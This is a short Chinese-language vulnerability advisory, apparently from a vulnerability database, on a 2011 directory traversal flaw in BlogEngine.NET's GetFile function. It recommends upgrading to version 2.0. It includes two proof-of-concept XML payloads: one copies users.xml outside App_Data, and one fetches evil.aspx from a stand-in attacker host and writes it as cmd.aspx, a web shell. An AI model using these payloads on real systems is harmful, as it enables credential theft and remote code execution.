CVE编号
N/A利用情况
暂无补丁情况
N/A披露时间
2011-01-06漏洞描述
BlogEngine.NET是一款开源博客系统。GETFILE函数的"destination"参数存在目录遍历攻击,使用/../../序列可把文件上传到App_Data/files之外的位置。<GetFile xmlns="http://dotnetblogengine.net/"><source>c:\webroot\blog\App_Data\users.xml</source><destination>../../aa.txt</destination></GetFile><GetFile xmlns="http://dotnetblogengine.net/"><source>http://attacker/evil.aspx</source><destination>/../../cmd.aspx</destination></GetFile>解决建议
BlogEngine.NET 2.0已经修复此漏洞,建议用户下载使用:http://www.dotnetblogengine.net/
参考链接 |
|
---|---|
https://www.cnvd.org.cn/flaw/show/CNVD-2011-0026 |
- 攻击路径 N/A
- 攻击复杂度 N/A
- 权限要求 N/A
- 影响范围 N/A
- 用户交互 N/A
- 可用性 N/A
- 保密性 N/A
- 完整性 N/A
还没有评论,来说两句吧...